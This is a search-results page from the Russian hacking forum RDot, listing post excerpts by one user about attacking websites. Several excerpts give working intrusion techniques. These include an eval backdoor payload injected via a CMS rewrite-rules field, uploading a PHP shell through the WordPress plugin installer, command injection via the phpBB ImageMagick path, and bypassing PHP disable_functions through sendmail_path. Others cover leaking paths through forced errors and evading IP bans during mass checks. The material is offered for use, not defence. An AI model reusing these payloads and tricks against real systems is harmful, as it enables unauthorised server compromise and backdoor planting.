Вернуться   RDot > Поиск по форуму

Показано с 1 по 25 из 29.
На поиск затрачено 0.00 сек.
Поиск: Сообщения от: Лаврушкин
Раздел: Форумы 17.01.2016, 14:14
Ответов: 6
Просмотров: 19,164
Автор Лаврушкин
А блинд на каком-то движке? Попробуй базу...

А блинд на каком-то движке? Попробуй базу прошустрить на наличие путей.
если там пых и error_reporting позволяет - попробуй вызвать ошибку путем различного воздействия (PHPSESSID=&^#@,.php?param[]=,...
Раздел: Web-среда/Web-applications 09.11.2015, 01:40
Ответов: 3,616
Просмотров: 1,922,390
Автор Лаврушкин
Подробно разобрано...

Подробно разобрано https://rdot.org/forum/showthread.php?t=926
в особенности https://rdot.org/forum/showpost.php?p=10994&postcount=27
Раздел: Web-среда/Web-applications 08.11.2015, 17:01
Ответов: 3,616
Просмотров: 1,922,390
Автор Лаврушкин
Не уверен, но посмотри...

Не уверен, но посмотри http://www.slideshare.net/qqlan/database-honeypot-by-design-25195927
В подробностях не разбирал.
Раздел: Коммерция/Сommerce 27.10.2015, 16:55
Ответов: 83
Просмотров: 88,670
Автор Лаврушкин
Оплатил для теста на неделю тариф TripleVPN. ...

Оплатил для теста на неделю тариф TripleVPN.
Пробовал подключится к 2 входным(SE1,UK1) и 6 выходным серверам - результат подключение по openvpn есть, а гугл даже не открывает.
перепробовал разные...
Раздел: Оффтоп/Offtopic 30.06.2015, 15:18
Ответов: 9
Просмотров: 5,370
Автор Лаврушкин
Кидать уже некого было, вот и закрылись. ...

Кидать уже некого было, вот и закрылись.
1337day и скаммер это уже синонимы, теперь вон на конференции в соседних топиках приглашают.
Раздел: Web-среда/Web-applications 29.05.2015, 17:20
Ответов: 3,616
Просмотров: 1,922,390
Автор Лаврушкин
Попробуй в плагин-инсталл в лоб скормить ему php...

Попробуй в плагин-инсталл в лоб скормить ему php файл. далее ищи свой файл в папке wp-content/uploads/год/месяц/файл, либо в папке wp-content/uploads/файл
Выдаст что
The package could not be...
Раздел: Сценарии/CMF/СMS 25.09.2014, 16:36
Ответов: 6
Просмотров: 10,932
Автор Лаврушкин
Это работает только со старыми версиями WP. где...

Это работает только со старыми версиями WP. где ключ для восстановления в чистом виде лежит в базе.
В новых версиях этот ключ уже хешеируется.
Раздел: Оффтоп/Offtopic 08.09.2014, 17:06
Ответов: 6
Просмотров: 4,869
Автор Лаврушкин
Не уверен насчёт 1400 за сутки на ип. подряд -...

Не уверен насчёт 1400 за сутки на ип. подряд - может быть. а если использовать таймайут небольшой между запросами и миксить пару ип? миллион конечно не прочекаешь за час. но бана я думаю можно будет...
Раздел: Релизы/Releases 29.07.2014, 17:25
Ответов: 43
Просмотров: 86,078
Автор Лаврушкин
В бинге изменилась выдача. и теперь там кстати...

В бинге изменилась выдача. и теперь там кстати много мусора непонятного.
в файле
classes/class.CBingReverseIP.php
измени функцию StartParsePage
На
protected function StartParsePage($content){...
Раздел: Квесты/CTF 27.05.2014, 16:22
Ответов: 8
Просмотров: 12,460
Автор Лаврушкин
Жаль что такой маленький обхват был сервисов...

Жаль что такой маленький обхват был сервисов майлру. у майлру дофигища поддоменов. и как показывает история, на них масса всяких вкусностей.
Раздел: Форумы 12.04.2014, 13:21
Ответов: 10
Просмотров: 14,340
Автор Лаврушкин
Если стили взять например. там theme_info.cfg...

Если стили взять например. там theme_info.cfg хотябы правится?(по стандартным путям) права на запись есть? Edit Theme работает?
Раздел: Web-среда/Web-applications 20.03.2014, 02:07
Ответов: 1
Просмотров: 5,462
Автор Лаврушкин
Заходишь в Custom Rewrite Rules Пишешь...

Заходишь в
Custom Rewrite Rules

Пишешь там

'rdot\' => ');@eval($_SERVER[HTTP_EVAL]);(1//'
И не забудь передать EVAL через HTTP-хидеры.
Раздел: Форумы 31.10.2013, 16:45
Ответов: 1
Просмотров: 8,706
Автор Лаврушкин
А подробнее можно?

А подробнее можно?
Раздел: Форумы 18.05.2013, 12:41
Ответов: 7
Просмотров: 13,489
Автор Лаврушкин
функция create_thumbnail в ласт версии phpbb без...

функция create_thumbnail в ласт версии phpbb без изменения.
выше в этой функции есть ещё условия. быть может они не выполняются. может passthru в disable. может быть ещё не одно НО.
поэтому...
Раздел: Уязвимости PHP/PHP vulnerabilities 05.02.2013, 20:49
Ответов: 7
Просмотров: 10,756
Автор Лаврушкин
Насколько я помню, то с абсолютным путем эта...

Насколько я помню, то с абсолютным путем эта штука не работает. и более универсальным считалась точка '.' )
Раздел: Повышение привилегий/Privilege escalation 28.12.2012, 14:01
Ответов: 12
Просмотров: 12,691
Автор Лаврушкин
Тестил кто?

Тестил кто?
Раздел: Статьи/Articles 21.09.2012, 11:08
Ответов: 67
Просмотров: 123,527
Автор Лаврушкин
ссылка http://php.net/manual/ru/wrappers.php...

ссылка http://php.net/manual/ru/wrappers.php более информативна. хотябы примеров что ли больше привел.
Раздел: Web-среда/Web-applications 18.06.2012, 16:56
Ответов: 8
Просмотров: 6,543
Автор Лаврушкин
Покажи реализацию чтения например /etc/passwd

Покажи реализацию чтения например /etc/passwd
Раздел: Форумы 23.04.2012, 00:23
Ответов: 7
Просмотров: 13,489
Автор Лаврушкин
Навеяло пред темой. Идем в...

Навеяло пред темой.
Идем в General->Attachment settings
Ставим галочки на Allow attachments,Display images inline,Create thumbnail
Там есть Imagemagick path: херачим туда что то вроде
sh -c...
Раздел: Web-среда/Web-applications 20.04.2012, 15:01
Ответов: 21
Просмотров: 15,153
Автор Лаврушкин
Нет не винда была. ответ нашёл сам. в шестом...

Нет не винда была. ответ нашёл сам. в шестом посте. Кстати на Win это не прокатит.
Расскажи про вариант с Win.
Раздел: Web-среда/Web-applications 16.04.2012, 02:33
Ответов: 21
Просмотров: 15,153
Автор Лаврушкин
Можно. Покурил сурсы пыха и разобрался. ...

Можно.
Покурил сурсы пыха и разобрался.
оказывается sendmail_path попадает в popen.
Сотвественно можно херачить прямо sendmail_path = "id >> /tmp/id"
Потом вызываем mail(); и радуемся.
Раздел: Web-среда/Web-applications 15.04.2012, 22:43
Ответов: 21
Просмотров: 15,153
Автор Лаврушкин
Там он как то автоматом чтоли подгружает через...

Там он как то автоматом чтоли подгружает через какое то время. ещё пока не разобрался. но соль в том что подгружает новый ini.


perl, ssi не вариант. а есть ещё варианты?
Раздел: Web-среда/Web-applications 15.04.2012, 19:40
Ответов: 21
Просмотров: 15,153
Автор Лаврушкин
php.ini и выполнение команд

Приветствую.
Такая ситуация.
disable_functions = exec,system...etc
Есть возможность редактирования php.ini.
Пытался перезаписать disable_functions ..не выходит. они где то на другом уровне...
Раздел: Уязвимости PHP/PHP vulnerabilities 22.12.2011, 09:32
Ответов: 8
Просмотров: 8,643
Автор Лаврушкин
На багтрекере пхп это светилось как минимум пару...

На багтрекере пхп это светилось как минимум пару раз.
Раздел: Уязвимости PHP/PHP vulnerabilities 22.12.2011, 02:10
Ответов: 8
Просмотров: 8,643
Автор Лаврушкин
Реализуема. только tmp_name станет массивом.

Реализуема. только tmp_name станет массивом.
Показано с 1 по 25 из 29.

 
Быстрый переход


Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2019, Jelsoft Enterprises Ltd. Перевод: zCarot